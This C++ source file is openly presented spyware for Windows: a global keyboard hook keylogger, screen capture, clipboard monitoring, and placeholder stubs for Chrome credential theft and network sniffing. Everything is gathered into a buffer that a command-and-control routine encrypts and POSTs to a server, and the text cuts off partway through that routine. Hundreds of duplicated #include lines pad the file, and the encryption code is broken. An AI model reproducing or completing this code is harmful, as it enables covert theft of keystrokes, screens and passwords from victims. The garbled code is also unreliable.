#include <winsock2.h>
#include <ws2tcpip.h>
#include <windows.h>
#include <bcrypt.h>
#include <wincrypt.h>
#include <vector>
#include <string>
#include <fstream>
#include <iostream>
#include <sstream>
#include <thread>
#include <mutex>
#include <algorithm>
#include <ctime>
#include <direct.h>
#include <shellapi.h>
#include <map>
#include <unordered_map>
#include <functional>
#include <atomic>
#include <vector>
#include <sstream>
#include <fstream>
#include <string>
#include <ctime>
#include <vector>
#include <map>
#include <functional>
#include <atomic>
#include <thread>
#include <mutex>
#include <vector>
#include <sstream>
#include <fstream>
#include <string>
#include <ctime>
#include <vector>
#include <map>
#include <functional>
#include <atomic>
#include <thread>
#include <mutex>
#include <vector>
#include <sstream>
#include <fstream>
#include <string>
#include <ctime>
#include <vector>
#include <map>
#include <functional>
#include <atomic>
#include <thread>
#include <mutex>
#include <vector>
#include <sstream>
#include <fstream>
#include <string>
#include <ctime>
#include <vector>
#include <map>
#include <functional>
#include <atomic>
#include <thread>
#include <mutex>
#include <vector>
#include <sstream>
#include <fstream>
#include <string>
#include <ctime>
#include <vector>
#include <map>
#include <functional>
#include <atomic>
#include <thread>
#include <mutex>
#include <vector>
#include <sstream>
#include <fstream>
#include <string>
#include <ctime>
#include <vector>
#include <map>
#include <functional>
#include <atomic>
#include <thread>
#include <mutex>
#include <vector>
#include <sstream>
#include <fstream>
#include <string>
#include <ctime>
#include <vector>
#include <map>
#include <functional>
#include <atomic>
#include <thread>
#include <mutex>
#include <vector>
#include <sstream>
#include <fstream>
#include <string>
#include <ctime>
#include <vector>
#include <map>
#include <functional>
#include <atomic>
#include <thread>
#include <mutex>
#include <vector>
#include <sstream>
#include <fstream>
#include <string>
#include <ctime>
#include <vector>
#include <map>
#include <functional>
#include <atomic>
#include <thread>
#include <mutex>
#include <vector>
#include <sstream>
#include <fstream>
#include <string>
#include <ctime>
#include <vector>
#include <map>
#include <functional>
#include <atomic>
#include <thread>
#include <mutex>
#include <vector>
#include <sstream>
#include <fstream>
#include <string>
#include <ctime>
#include <vector>
#include <map>
#include <functional>
#include <atomic>
#include <thread>
#include <mutex>
#include <vector>
#include <sstream>
#include <fstream>
#include <string>
#include <ctime>
#include <vector>
#include <map>
#include <functional>
#include <atomic>
#include <thread>
#include <mutex>
#include <vector>
#include <sstream>
#include <fstream>
#include <string>
#include <ctime>
#include <vector>
#include <map>
#include <functional>
#include <atomic>
#include <thread>
#include <mutex>
#include <vector>
#include <sstream>
#include <fstream>
#include <string>
#include <ctime>
#include <vector>
#include <map>
#include <functional>
#include <atomic>
#include <thread>
#include <mutex>
#include <vector>
#include <sstream>
#include <fstream>
#include <string>
#include <ctime>
#include <vector>
#include <map>
#include <functional>
#include <atomic>
#include <thread>
#include <mutex>
#include <vector>
#include <sstream>
#include <fstream>
#include <string>
#include <ctime>
#include <vector>
#include <map>
#include <functional>
#include <atomic>
#include <thread>
#include <mutex>
#include <vector>
#include <sstream>
#include <fstream>
#include <string>
#include <ctime>
#include <vector>
#include <map>
#include <functional>
#include <atomic>
#include <thread>
#include <mutex>
#include <vector>
#include <sstream>
#include <fstream>
#include <string>
#include <ctime>
#include <vector>
#include <map>
#include <functional>
#include <atomic>
#include <thread>
#include <mutex>
#include <vector>
#include <sstream>
#include <fstream>
#include <string>
#include <ctime>
#include <vector>
#include <map>
#include <functional>
#include <atomic>
#include <thread>
#include <mutex>
#include <vector>
#include <sstream>
#include <fstream>
#include <string>
#include <ctime>
#include <vector>
#include <map>
#include <functional>
#include <atomic>
#include <thread>
#include <mutex>
#include <vector>
#include <sstream>
#include <fstream>
#include <string>
#include <ctime>
#include <vector>
#include <map>
#include <functional>
#include <atomic>
#include <thread>
#include <mutex>
#include <vector>
#include <sstream>
#include <fstream>
#include <string>
#include <ctime>
#include <vector>
#include <map>
#include <functional>
#include <atomic>
#include <thread>
#include <mutex>
#include <vector>
#include <sstream>
#include <fstream>
#include <string>
#include <ctime>
#include <vector>
#include <map>
#include <functional>
#include <atomic>
#include <thread>
#include <mutex>
#include <vector>
#include <sstream>
#include <fstream>
#include <string>
#include <ctime>
#include <vector>
#include <map>
#include <functional>
#include <atomic>
#include <thread>
#include <mutex>
#include <vector>
#include <sstream>
#include <fstream>
#include <string>
#include <ctime>
#include <vector>
#include <map>
#include <functional>
#include <atomic>
#include <thread>
#include <mutex>
#include <vector>
#include <sstream>
#include <fstream>
#include <string>
#include <ctime>
#include <vector>
#include <map>
#include <functional>
#include <atomic>
#include <thread>
#include <mutex>
#include <vector>
#include <sstream>
#include <fstream>
#include <string>
#include <ctime>
#include <vector>
#include <map>
#include <functional>
#include <atomic>
#include <thread>
#include <mutex>
#include <vector>
#include <sstream>
#include <fstream>
#include <string>
#include <ctime>
#include <vector>
#include <map>
#include <functional>
#include <atomic>
#include <thread>
#include <mutex>
#include <vector>
#include <sstream>
#include <fstream>
#include <string>
#include <ctime>
#include <vector>
#include <map>
#include <functional>
#include <atomic>
#include <thread>
#include <mutex>
#include <vector>
#include <sstream>
#include <fstream>
#include <string>
#include <ctime>
#include <vector>
#include <map>
#include <functional>
#include <atomic>
#include <thread>
#include <mutex>
#include <vector>
#include <sstream>
#include <fstream>
#include <string>
#include <ctime>
#include <vector>
#include <map>
#include <functional>
#include <atomic>
#include <thread>
#include <mutex>
#include <vector>
#include <sstream>
#include <fstream>
#include <string>
#include <ctime>
#include <vector>
#include <map>
#include <functional>
#include <atomic>
#include <thread>
#include <mutex>
#include <vector>
#include <sstream>
#include <fstream>
#include <string>
#include <ctime>
#include <vector>
#include <map>
#include <functional>
#include <atomic>
#include <thread>
#include <mutex>
#include <vector>
#include <sstream>
#include <fstream>
#include <string>
#include <ctime>
#include <vector>
#include <map>
#include <functional>
#include <atomic>
#include <thread>
#include <mutex>
#include <vector>
#include <sstream>
#include <fstream>
#include <string>
#include <ctime>
#include <vector>
#include <map>
#include <functional>
#include <atomic>
#include <thread>
#include <mutex>
#include <vector>
#include <sstream>
#include <fstream>
#include <string>
#include <ctime>
#include <vector>
#include <map>
#include <functional>
#include <atomic>
#include <thread>
#include <mutex>
#include <vector>
#include <sstream>
#include <fstream>
#include <string>
#include <ctime>
#include <vector>
#include <map>
#include <functional>
#include <atomic>
#include <thread>
#include <mutex>
#include <vector>
#include <sstream>
#include <fstream>
#include <string>
#include <ctime>
#include <vector>
#include <map>
#include <functional>
#include <atomic>
#include <thread>
#include <mutex>
#include <vector>
#include <sstream>
#include <fstream>
#include <string>
#include <ctime>
#include <vector>
#include <map>
#include <functional>
#include <atomic>
#include <thread>
#include <mutex>
#include <vector>
#include <sstream>
#include <fstream>
#include <string>
#include <ctime>
#include <vector>
#include <map>
#include <functional>
#include <atomic>
#include <thread>
#include <mutex>
#include <vector>
#include <sstream>
#include <fstream>
#include <string>
#include <ctime>
#include <vector>
#include <map>
#include <functional>
#include <atomic>
#include <thread>
#include <mutex>
#include <vector>
#include <sstream>
#include <fstream>
#include <string>
#include <ctime>
#include <vector>
#include <map>
#include <functional>
#include <atomic>
#include <thread>
#include <mutex>
#include <vector>
#include <sstream>
#include <fstream>
#include <string>
#include <ctime>
#include <vector>
#include <map>
#include <functional>
#include <atomic>
#include <thread>
#include <mutex>
#include <vector>
#include <sstream>
#include <fstream>
#include <string>
#include <ctime>
#include <vector>
#include <map>
#include <functional>
#include <atomic>
#include <thread>
#include <mutex>
#include <vector>
#include <sstream>
#include <fstream>
#include <string>
#include <ctime>
#include <vector>
#include <map>
#include <functional>
#include <atomic>
#include <thread>
#include <mutex>
#include <vector>
#include <sstream>
#include <fstream>
#include <string>
#include <ctime>
#include <vector>
#include <map>
#include <functional>
#include <atomic>
#include <thread>
#include <mutex>
#include <vector>
#include <sstream>
#include <fstream>
#include <string>
#include <ctime>
#include <vector>
#include <map>
#include <functional>
#include <atomic>
#include <thread>
#include <mutex>
#include <vector>
#include <sstream>
#include <fstream>
#include <string>
#include <ctime>
#include <vector>
#include <map>
#include <functional>
#include <atomic>
#include <thread>
#include <mutex>
#include <vector>
#include <sstream>
#include <fstream>
#include <string>
#include <ctime>
#include <vector>
#include <map>
#include <functional>
#include <atomic>
#include <thread>
#include <mutex>
#include <vector>
#include <sstream>
#include <fstream>
#include <string>
#include <ctime>
#include <vector>
#include <map>
#include <functional>
#include <atomic>
#include <thread>
#include <mutex>
#include <vector>
#include <sstream>
#include <fstream>
#include <string>
#include <ctime>
#include <vector>
#include <map>
#include <functional>
#include <atomic>
#include <thread>
#include <mutex>
#include <vector>
#include <sstream>
#include <fstream>
#include <string>
#include <ctime>
#include <vector>
#include <map>
#include <functional>
#include <atomic>
#include <thread>
#include <mutex>
#include <vector>
#include <sstream>
#include <fstream>
#include <string>
#include <ctime>
#include <vector>
#include <map>
#include <functional>
#include <atomic>
#include <thread>
#include <mutex>
#include <vector>
#include <sstream>
#include <fstream>
#include <string>
#include <ctime>
#include <vector>
#include <map>
#include <functional>
#include <atomic>
#include <thread>
#include <mutex>
#include <vector>
#include <sstream>
#include <fstream>
#include <string>
#include <ctime>
#include <vector>
#include <map>
#include <functional>
#include <atomic>
#include <thread>
#include <mutex>
#include <vector>
#include <sstream>
#include <fstream>
#include <string>
#include <ctime>
#include <vector>
#include <map>
#include <functional>
#include <atomic>
#include <thread>
#include <mutex>
#include <vector>
#include <sstream>
#include <fstream>
#include <string>
#include <ctime>
#include <vector>
#include <map>
#include <functional>
#include <atomic>
#include <thread>
#include <mutex>
#include <vector>
#include <sstream>
#include <fstream>
#include <string>
#include <ctime>
#include <vector>
#include <map>
#include <functional>
#include <atomic>
#include <thread>
#include <mutex>
#include <vector>
#include <sstream>
#include <fstream>
#include <string>
#include <ctime>
#include <vector>
#include <map>
#include <functional>
#include <atomic>
#include <thread>
#include <mutex>
#include <vector>
#include <sstream>
#include <fstream>
#include <string>
#include <ctime>
#include <vector>
#include <map>
#include <functional>
#include <atomic>
#include <thread>
#include <mutex>
#include <vector>
#include <sstream>
#include <fstream>
#include <string>
#include <ctime>
#include <vector>
#include <map>
#include <functional>
#include <atomic>
#include <thread>
#include <mutex>
#include <vector>
#include <sstream>
#include <fstream>
#include <string>
#include <ctime>
#include <vector>
#include <map>
#include <functional>
#include <atomic>
#include <thread>
#include <mutex>
#include <vector>
#include <sstream>
#include <fstream>
#include <string>
#include <ctime>
#include <vector>
#include <map>
#include <functional>
#include <atomic>
#include <thread>
#include <mutex>
#include <vector>
#include <sstream>
#include <fstream>
#include <string>
#include <ctime>
#include <vector>
#include <map>
#include <functional>
#include <atomic>
#include <thread>
#include <mutex>
#include <vector>
#include <sstream>
#include <fstream>
#include <string>
#include <ctime>
#include <vector>
#include <map>
#include <functional>
#include <atomic>
#include <thread>
#include <mutex>
#include <vector>
#include <sstream>
#include <fstream>
#include <string>
#include <ctime>
#include <vector>
#include <map>
#include <functional>
#include <atomic>
#include <thread>
#include <mutex>
#include <vector>
#include <sstream>
#include <fstream>
#include <string>
#include <ctime>
#include <vector>
#include <map>
#include <functional>
#include <atomic>
#include <thread>
#include <mutex>
#include <vector>
#include <sstream>
#include <fstream>
#include <string>
#include <ctime>
#include <vector>
#include <map>
#include <functional>
#include <atomic>
#include <thread>
#include <mutex>
#include <vector>
#include <sstream>
#include <fstream>
#include <string>
#include <ctime>
#include <vector>
#include <map>
#include <functional>
#include <atomic>
#include <thread>
#include <mutex>
#include <vector>
#include <sstream>
#include <fstream>
#include <string>
#include <ctime>
#include <vector>
#include <map>
#include <functional>
#include <atomic>
#include <thread>
#include <mutex>
#include <vector>
#include <sstream>
#include <fstream>
#include <string>
#include <ctime>
#include <vector>
#include <map>
#include <functional>
#include <atomic>
#include <thread>
#include <mutex>
#include <vector>
#include <sstream>
#include <fstream>
#include <string>
#include <ctime>
#include <vector>
#include <map>
#include <functional>
#include <atomic>
#include <thread>
#include <mutex>
#include <vector>
#include <sstream>
#include <fstream>
#include <string>
#include <ctime>
#include <vector>
#include <map>
#include <functional>
#include <atomic>
#include <thread>
#include <mutex>
#include <vector>
#include <sstream>
#include <fstream>
#include <string>
#include <ctime>
#include <vector>
#include <map>
#include <functional>
#include <atomic>
#include <thread>
#include <mutex>
#include <vector>
#include <sstream>
#include <fstream>
#include <string>
#include <ctime>
#include <vector>
#include <map>
#include <functional>
#include <atomic>
#include <thread>
#include <mutex>
#include <vector>
#include <sstream>
#include <fstream>
#include <string>
#include <ctime>
#include <vector>
#include <map>
#include <functional>
#include <atomic>
#include <thread>
#include <mutex>
#include <vector>
#include <sstream>
#include <fstream>
#include <string>
#include <ctime>
#include <vector>
#include <map>
#include <functional>
#include <atomic>
#include <thread>
#include <mutex>
#include <vector>
#include <sstream>
#include <fstream>
#include <string>
#include <ctime>
#include <vector>
#include <map>
#include <functional>
#include <atomic>
#include <thread>
#include <mutex>
#include <vector>
#include <sstream>
#include <fstream>
#include <string>
#include <ctime>
#include <vector>
#include <map>
#include <functional>
#include <atomic>
#include <thread>
#include <mutex>
#include <vector>
#include <sstream>
#include <fstream>
#include <string>
#include <ctime>
#include <vector>
#include <map>
#include <functional>
#include <atomic>
#include <thread>
#include <mutex>
#include <vector>
#include <sstream>
#include <fstream>
#include <string>
#include <ctime>
#include <vector>
#include <map>
#include <functional>
#include <atomic>
#include <thread>
#include <mutex>
#include <vector>
#include <sstream>
#include <fstream>
#include <string>
#include <ctime>
#include <vector>
#include <map>
#include <functional>
#include <atomic>
#include <thread>
#include <mutex>
#include <vector>
#include <sstream>
#include <fstream>
#include <string>
#include <ctime>
#include <vector>
#include <map>
#include <functional>
#include <atomic>
#include <thread>
#include <mutex>
#include <vector>
#include <sstream>
#include <fstream>
#include <string>
#include <ctime>
#include <vector>
#include <map>
#include <functional>
#include <atomic>
#include <thread>
#include <mutex>
#include <vector>
#include <sstream>
#include <fstream>
#include <string>
#include <ctime>
#include <vector>
#include <map>
#include <functional>
#include <atomic>
#include <thread>
#include <mutex>
#include <vector>
#include <sstream>
#include <fstream>
#include <string>
#include <ctime>
#include <vector>
#include <map>
#include <functional>
#include <atomic>
#include <thread>
#include <mutex>
#include <vector>
#include <sstream>
#include <fstream>
#include <string>
#include <ctime>
#include <vector>
#include <map>
#include <functional>
#include <atomic>
#include <thread>
#include <mutex>
#include <vector>
#include <sstream>
#include <fstream>
#include <string>
#include <ctime>
#include <vector>
#include <map>
#include <functional>
#include <atomic>
#include <thread>
#include <mutex>
#include <vector>
#include <sstream>
#include <fstream>
#include <string>
#include <ctime>
#include <vector>
#include <map>
#include <functional>
#include <atomic>
#include <thread>
#include <mutex>
#include <vector>
#include <sstream>
#include <fstream>
#include <string>
#include <ctime>
#include <vector>
#include <map>
#include <functional>
#include <atomic>
#include <thread>
#include <mutex>
#include <vector>
#include <sstream>
#include <fstream>
#include <string>
#include <ctime>
#include <vector>
#include <map>
#include <functional>
#include <atomic>
#include <thread>
#include <mutex>
#include <vector>
#include <sstream>
#include <fstream>
#include <string>
#include <ctime>
#include <vector>
#include <map>
#include <functional>
#include <atomic>
#include <thread>
#include <mutex>
#include <vector>
#include <sstream>
#include <fstream>
#include <string>
#include <ctime>
#include <vector>
#include <map>
#include <functional>
#include <atomic>
#include <thread>
#include <mutex>
#include <vector>
#include <sstream>
#include <fstream>
#include <string>
#include <ctime>
#include <vector>
#include <map>
#include <functional>
#include <atomic>
#include <thread>
#include <mutex>
#include <vector>
#include <sstream>
#include <fstream>
#include <string>
#include <ctime>
#include <vector>
#include <map>
#include <functional>
#include <atomic>
#include <thread>
#include <mutex>
#include <vector>
#include <sstream>
#include <fstream>
#include <string>
#include <ctime>
#include <vector>
#include <map>
#include <functional>
#include <atomic>
#include <thread>
#include <mutex>
#include <vector>
#include <sstream>
#include <fstream>
#include <string>
#include <ctime>
#include <vector>
#include <map>
#include <functional>
#include <atomic>
#include <thread>
#include <mutex>
#include <vector>
#include <sstream>
#include <fstream>
#include <string>
#include <ctime>
#include <vector>
#include <map>
#include <functional>
#include <atomic>
#include <thread>
#include <mutex>
#include <vector>
#include <sstream>
#include <fstream>
#include <string>
#include <ctime>
#include <vector>
#include <map>
#include <functional>
#include <atomic>
#include <thread>
#include <mutex>
#include <vector>
#include <sstream>
#include <fstream>
#include <string>
#include <ctime>
#include <vector>
#include <map>
#include <functional>
#include <atomic>
#include <thread>
#include <mutex>
#include <vector>
#include <sstream>
#include <fstream>
#include <string>
#include <ctime>
#include <vector>
#include <map>
#include <functional>
#include <atomic>
#include <thread>
#include <mutex>
#include <vector>
#include <sstream>
#include <fstream>
#include <string>
#include <ctime>
#include <vector>
#include <map>
#include <functional>
#include <atomic>
#include <thread>
#include <mutex>
#include <vector>
#include <sstream>
#include <fstream>
#include <string>
#include <ctime>
#include <vector>
#include <map>
#include <functional>
#include <atomic>
#include <thread>
#include <mutex>
#include <vector>
#include <sstream>
#include <fstream>
#include <string>
#include <ctime>
#include <vector>
#include <map>
#include <functional>
#include <atomic>
#include <thread>
#include <mutex>
#include <vector>
#include <sstream>
#include <fstream>
#include <string>
#include <ctime>
#include <vector>
#include <map>
#include <functional>
#include <atomic>
#include <thread>
#include <mutex>
#include <vector>
#include <sstream>
#include <fstream>
#include <string>
#include <ctime>
#include <vector>
#include <map>
#include <functional>
#include <atomic>
#include <thread>
#include <mutex>
#include <vector>
#include <sstream>
#include <fstream>
#include <string>
#include <ctime>
#include <vector>
#include <map>
#include <functional>
#include <atomic>
#include <thread>
#include <mutex>
#include <vector>
#include <sstream>
#include <fstream>
#include <string>
#include <ctime>
#include <vector>
#include <map>
#include <functional>
#include <atomic>
#include <thread>
#include <mutex>
#include <vector>
#include <sstream>
#include <fstream>
#include <string>
#include <ctime>
#include <vector>
#include <map>
#include <functional>
#include <atomic>
#include <thread>
#include <mutex>
#include <vector>
#include <sstream>
#include <fstream>
#include <string>
#include <ctime>
#include <vector>
#include <map>
#include <functional>
#include <atomic>
#include <thread>
#include <mutex>
#include <vector>
#include <sstream>
#include <fstream>
#include <string>
#include <ctime>
#include <vector>
#include <map>
#include <functional>
#include <atomic>
#include <thread>
#include <mutex>
#include <vector>
#include <sstream>
#include <fstream>
#include <string>
#include <ctime>
#include <vector>
#include <map>
#include <functional>
#include <atomic>
#include <thread>
#include <mutex>
#include <vector>
#include <sstream>
#include <fstream>
#include <string>
#include <ctime>
#include <vector>
#include <map>
#include <functional>
#include <atomic>
#include <thread>
#include <mutex>
#include <vector>
#include <sstream>
#include <fstream>
#include <string>
#include <ctime>
#include <vector>
#include <map>
#include <functional>
#include <atomic>
#include <thread>
#include <mutex>
#include <vector>
#include <sstream>
#include <fstream>
#include <string>
#include <ctime>
#include <vector>
#include <map>
#include <functional>
#include <atomic>
#include <thread>
#include <mutex>
#include <vector>
#include <sstream>
#include <fstream>
#include <string>
#include <ctime>
#include <vector>
#include <map>
#include <functional>
#include <atomic>
#include <thread>
#include <mutex>
#include <vector>
#include <sstream>
#include <fstream>
#include <string>
#include <ctime>
#include <vector>
#include <map>
#include <functional>
#include <atomic>
#include <thread>
#include <mutex>
#include <vector>
#include <sstream>
#include <fstream>
#include <string>
#include <ctime>
#include <vector>
#include <map>
#include <functional>
#include <atomic>
#include <thread>
#include <mutex>
#include <vector>
#include <sstream>
#include <fstream>
#include <string>
#include <ctime>
#include <vector>
#include <map>
#include <functional>
#include <atomic>
#include <thread>
#include <mutex>
#include <vector>
#include <sstream>
#include <fstream>
#include <string>
#include <ctime>
#include <vector>
#include <map>
#include <functional>
#include <atomic>
#include <thread>
#include <mutex>
#include <vector>
#include <sstream>
#include <fstream>
#include <string>
#include <ctime>
#include <vector>
#include <map>
#include <functional>
#include <atomic>
#include <thread>
#include <mutex>
#include <vector>
#include <sstream>
#include <fstream>
#include <string>
#include <ctime>
#include <vector>
#include <map>
#include <functional>
#include <atomic>
#include <thread>
#include <mutex>
#include <vector>
#include <sstream>
#include <fstream>
#include <string>
#include <ctime>
#include <vector>
#include <map>
#include <functional>
#include <atomic>
#include <thread>
#include <mutex>
#include <vector>
#include <sstream>
#include <fstream>
#include <string>
#include <ctime>
#include <vector>
#include <map>
#include <functional>
#include <atomic>
#include <thread>
#include <mutex>
#include <vector>
#include <sstream>
#include <fstream>
#include <string>
#include <ctime>
#include <vector>
#include <map>
#include <functional>
#include <atomic>
#include <thread>
#include <mutex>
#include <vector>
#include <sstream>
#include <fstream>
#include <string>
#include <ctime>
#include <vector>
#include <map>
#include <functional>
#include <atomic>
#include <thread>
#include <mutex>
#include <vector>
#include <sstream>
#include <fstream>
#include <string>
#include <ctime>
#include <vector>
#include <map>
#include <functional>
#include <atomic>
#include <thread>
#include <mutex>
#include <vector>
#include <sstream>
#include <fstream>
#include <string>
#include <ctime>
#include <vector>
#include <map>
#include <functional>
#include <atomic>
#include <thread>
#include <mutex>
#include <vector>
#include <sstream>
#include <fstream>
#include <string>
#include <ctime>
#include <vector>
#include <map>
#include <functional>
#include <atomic>
#include <thread>
#include <mutex>
#include <vector>
#include <sstream>
#include <fstream>
#include <string>
#include <ctime>
#include <vector>
#include <map>
#include <functional>
#include <atomic>
#include <thread>
#include <mutex>
#include <vector>
#include <sstream>
#include <fstream>
#include <string>
#include <ctime>
#include <vector>
#include <map>
#include <functional>
#include <atomic>
#include <thread>
#include <mutex>
#include <vector>
#include <sstream>
#include <fstream>
#include <string>
#include <ctime>
#include <vector>
#include <map>
#include <functional>
#include <atomic>
#include <thread>
#include <mutex>
#include <vector>
#include <sstream>
#include <fstream>
#include <string>
#include <ctime>
#include <vector>
#include <map>
#include <functional>
#include <atomic>
#include <thread>
#include <mutex>
#include <vector>
#include <sstream>
#include <fstream>
#include <string>
#include <ctime>
#include <vector>
#include <map>
#include <functional>
#include <atomic>
#include <thread>
#include <mutex>
#include <vector>
#include <sstream>
#include <fstream>
#include <string>
#include <ctime>
#include <vector>
#include <map>
#include <functional>
#include <atomic>
#include <thread>
#include <mutex>
#include <vector>
#include <sstream>
#include <fstream>
#include <string>
#include <ctime>
#include <vector>
#include <map>
#include <functional>
#include <atomic>
#include <thread>
#include <mutex>
#include <vector>
#include <sstream>
#include <fstream>
#include <string>
#include <ctime>
#include <vector>
#include <map>
#include <functional>
#include <atomic>
#include <thread>
#include <mutex>
#include <vector>
#include <sstream>
#include <fstream>
#include <string>
#include <ctime>
#include <vector>
#include <map>
#include <functional>
#include <atomic>
#include <thread>
#include <mutex>
#include <vector>
#include <sstream>
#include <fstream>
#include <string>
#include <ctime>
#include <vector>
#include <map>
#include <functional>
#include <atomic>
#include <thread>
#include <mutex>
#include <vector>
#include <sstream>
#include <fstream>
#include <string>
#include <ctime>
#include <vector>
#include <map>
#include <functional>
#include <atomic>
#include <thread>
#include <mutex>
#include <vector>
#include <sstream>
#include <fstream>
#include <string>
#include <ctime>
#include <vector>
#include <map>
#include <functional>
#include <atomic>
#include <thread>
#include <mutex>
#include <vector>
#include <sstream>
#include <fstream>
#include <string>
#include <ctime>
#include <vector>
#include <map>
#include <functional>
#include <atomic>
#include <thread>
#include <mutex>
#include <vector>
#include <sstream>
#include <fstream>
#include <string>
#include <ctime>
#include <vector>
#include <map>
#include <functional>
#include <atomic>
#include <thread>
#include <mutex>
#include <vector>
#include <sstream>
#include <fstream>
#include <string>
#include <ctime>
#include <vector>
#include <map>
#include <functional>
#include <atomic>
#include <thread>
#include <mutex>
#include <vector>
#include <sstream>
#include <fstream>
#include <string>
#include <ctime>
#include <vector>
#include <map>
#include <functional>
#include <atomic>
#include <thread>
#include <mutex>
#include <vector>
#include <sstream>
#include <fstream>
#include <string>
#include <ctime>
#include <vector>
#include <map>
#include <functional>
#include <atomic>
#include <thread>
#include <mutex>
#include <vector>
#include <sstream>
#include <fstream>
#include <string>
#include <ctime>
#include <vector>
#include <map>
#include <functional>
#include <atomic>
#include <thread>
#include <mutex>
#include <vector>
#include <sstream>
#include <fstream>
#include <string>
#include <ctime>
#include <vector>
#include <map>
#include <functional>
#include <atomic>
#include <thread>
#include <mutex>
#include <vector>
#include <sstream>
#include <fstream>
#include <string>
#include <ctime>
#include <vector>
#include <map>
#include <functional>
#include <atomic>
#include <thread>
#include <mutex>
#include <vector>
#include <sstream>
#include <fstream>
#include <string>
#include <ctime>
#include <vector>
#include <map>
#include <functional>
#include <atomic>
#include <thread>
#include <mutex>
#include <vector>
#include <sstream>
#include <fstream>
#include <string>
#include <ctime>
#include <vector>
#include <map>
#include <functional>
#include <atomic>
#include <thread>
#include <mutex>
#include <vector>
#include <sstream>
#include <fstream>
#include <string>
#include <ctime>
#include <vector>
#include <map>
#include <functional>
#include <atomic>
#include <thread>
#include <mutex>
#include <vector>
#include <sstream>
#include <fstream>

// Global variables
std::ofstream logFile;
std::string username = getenv("USERNAME");
std::string keylog;
bool isLogging = true;
bool shouldExit = false;
std::string serverIP = "127.0.0.1";
int serverPort = 8080;
std::string dataBuffer;
std::mutex mtx;

// AES Encryption (BCrypt)
std::string encrypt(const std::string& data, const std::string& key) {
    BCRYPT_HANDLE hAlg;
    BCryptOpenAlgorithmProvider(&hAlg, BCRYPT_AES_ALGORITHM, NULL, 0);
    
    BCRYPT_KEY_HANDLE hKey;
    BCryptGenerateKeyPair(hAlg, &hKey, 256, 0);

    // Encrypt the data
    std::string encryptedData;
    DWORD bytesEncrypted = 0;
    std::vector<UCHAR> buffer(data.size() + 16, 0);
    std::vector<UCHAR> inputBuffer(data.begin(), data.end());
    BCryptEncrypt(hKey, inputBuffer.data(), data.size(), NULL, NULL, 0, buffer.data(), data.size() + 16, &bytesEncrypted, 0);

    for (size_t i = 0; i < bytesEncrypted; ++i) {
        encryptedData += static_cast<char>(buffer[i]);
    }

    BCryptDestroyKey(hKey);
    BCryptDestroyKey(hAlg);
    return encryptedData;
}

// Function to log keypresses
void LogKey(int key) {
    if (key == VK_BACK) {
        if (!keylog.empty()) keylog.pop_back();
    } else if (key == VK_TAB || key == VK_RETURN || key == VK_SPACE || key == VK_SHIFT || key == VK_CONTROL || key == VK_MENU) {
        keylog += " ";
    } else if (key == VK_ESCAPE) {
        isLogging = false;
    } else {
        keylog += static_cast<char>(key);
    }
}

// Keyboard hook procedure
LRESULT CALLBACK KeyboardProc(int nCode, WPARAM wParam, LPARAM lParam) {
    if (nCode >= 0) {
        KBDLLHOOKSTRUCT* pKeyEvent = reinterpret_cast<KBDLLHOOKSTRUCT*>(lParam);
        if (wParam == WM_KEYDOWN || wParam == WM_SYSKEYDOWN) {
            LogKey(static_cast<int>(pKeyEvent->vkCode));
        }
    }
    return CallNextHookEx(NULL, nCode, wParam, lParam);
}

// Screen capture using GDI
void ScreenCapture() {
    HDC hdcScreen = GetDC(NULL);
    HDC hdcMem = CreateCompatibleDC(hdcScreen);
    int width = GetSystemMetrics(SM_CXSCREEN);
    int height = GetSystemMetrics(SM_CYSCREEN);
    HBITMAP hBitmap = CreateCompatibleBitmap(hdcScreen, width, height);
    HBITMAP hOldBitmap = (HBITMAP)SelectObject(hdcMem, hBitmap);
    BitBlt(hdcMem, 0, 0, width, height, hdcScreen, 0, 0, SRCCOPY);
    SelectObject(hdcMem, hOldBitmap);
    DeleteDC(hdcMem);
    DeleteDC(hdcScreen);

    BITMAPINFO bmi = { 0 };
    bmi.bmiHeader.biSize = sizeof(BITMAPINFOHEADER);
    bmi.bmiHeader.biWidth = width;
    bmi.bmiHeader.biHeight = -height;
    bmi.bmiHeader.biPlanes = 1;
    bmi.bmiHeader.biBitCount = 32;
    bmi.bmiHeader.biCompression = BI_RGB;

    std::vector<BYTE> buffer(width * height * 4);
    GetBitmapBits(hBitmap, width * height * 4, buffer.data());
    // Base64-encode the raw bitmap data
    auto base64_encode = [](const unsigned char* data, size_t len) -> std::string {
        static const char* table = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/";
        std::string out;
        out.reserve(((len + 2) / 3) * 4);
        size_t i = 0;
        while (i < len) {
            uint32_t a = i < len ? data[i++] : 0;
            uint32_t b = i < len ? data[i++] : 0;
            uint32_t c = i < len ? data[i++] : 0;
            uint32_t triple = (a << 16) + (b << 8) + c;
            out.push_back(table[(triple >> 18) & 0x3F]);
            out.push_back(table[(triple >> 12) & 0x3F]);
            out.push_back(i - 1 > len ? '=' : table[(triple >> 6) & 0x3F]);
            out.push_back(i > len ? '=' : table[triple & 0x3F]);
        }
        return out;
    };

    std::string screenData = base64_encode(buffer.data(), buffer.size());

    std::lock_guard<std::mutex> lock(mtx);
    dataBuffer += "SCREEN_CAPTURE|" + screenData + "\n";
}

// Clipboard monitoring
std::string GetClipboardText() {
    if (!OpenClipboard(nullptr)) {
        return "";
    }

    HANDLE hData = GetClipboardData(CF_TEXT);
    std::string clipboardText;
    if (hData != nullptr) {
        char* pszText = static_cast<char*>(GlobalLock(hData));
        if (pszText != nullptr) {
            clipboardText = pszText;
            GlobalUnlock(hData);
        }
    }

    CloseClipboard();
    return clipboardText;
}

void ClipboardMonitor() {
    std::string clipboardText = GetClipboardText();
    std::lock_guard<std::mutex> lock(mtx);
    dataBuffer += "CLIPBOARD|" + clipboardText + "\n";
}

// Browser data theft (Chrome)
void BrowserDataTheft() {
    // Add code to extract cookies, passwords, etc. from Chrome
    std::string chromeData = "CHROME_DATA|";
    std::lock_guard<std::mutex> lock(mtx);
    dataBuffer += chromeData + "\n";
}

// Network traffic sniffing
void NetworkTrafficSniffing() {
    // Use WinPcap to sniff network traffic
    std::string trafficData = "NETWORK_TRAFFIC|";
    std::lock_guard<std::mutex> lock(mtx);
    dataBuffer += trafficData + "\n";
}

// Command and Control (C2)
void SendDataToC2() {
    std::string encryptedData = encrypt(dataBuffer, "supersecretkey");
    std::string request = "POST / HTTP/1.1\r\nHost: " + serverIP + "\r\nContent-Length: " + std::to_string(encryptedData.size()) + "\r\n\r\n" + encryptedData;
    SOCKET sock = ::socket(AF_INET, SOCK_STREAM, 0);
